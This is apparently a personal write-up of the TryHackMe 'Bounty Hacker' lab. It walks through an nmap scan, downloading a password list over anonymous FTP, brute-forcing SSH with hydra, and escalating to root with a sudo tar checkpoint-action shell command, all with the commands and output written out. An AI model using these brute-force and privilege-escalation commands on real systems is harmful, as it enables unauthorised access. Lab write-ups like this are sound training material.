TryHackMe: Bounty Hacker

Bounty Hacker was a very simple and easy room, it was fun but very quick, didn’t need to do much really. Also, done 2 more rooms along this one but didn’t enjoy much, were also very easy but confusing so i’m just posting this one.

https://tryhackme.com/room/cowboyhacker

Initial Enumeration

Nmap Scan

We start with our nmap scan:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.246.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-06 17:49 GMT
Nmap scan report for 10.10.246.138
Host is up (0.063s latency).
Not shown: 55529 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
|_-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.23.58.75
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 277.19 seconds

FTP

We see from the scan that we can log into ftp anonymously and that inside are 2 files, so what we can do is use the get command to download the files to our machine so we can read whats inside them:

ftp> get locks.txt
local: locks.txt remote: locks.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
100% |*********************************************************************************************|   418       10.77 MiB/s    00:00 ETA
226 Transfer complete.
418 bytes received in 00:00 (6.61 KiB/s)

ftp> get task.txt
local: task.txt remote: task.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
100% |*********************************************************************************************|    68      948.66 KiB/s    00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (1.04 KiB/s)

FTP sometimes can get stuck because of PASV, or Passive Mode. To get around this just enter inside ftp the command passive to turn PASV on/off.

Reading the locks.txt file gave us some weird words, that also look like passwords:

┌──(kali㉿kali)-[~/Desktop]
└─$ cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e

And reading the task.txt file we find a name:

┌──(kali㉿kali)-[~/Desktop]
└─$ cat task.txt     
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

Shell as lin

With the information gathered we could try brute forcing lin with the list of passwords, using hydra:

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -l lin -P list 10.10.246.138 ssh    
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-06 18:14:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.246.138:22/
[22][ssh] host: 10.10.246.138   login: lin   password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-06 18:14:29

We found the password, now we can log into ssh with lin and read the user flag:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh lin@10.10.246.138    
lin@10.10.246.138's password: 
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{REDACTED}

Shell as root

Enumerating the machine we find that lin has sudo permissions to execute the binary tar doing sudo -l:

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

And going to GTFOBins we see that to get root we just need to run the command:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

So now we just run it and read the root flag:

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{REDACTED}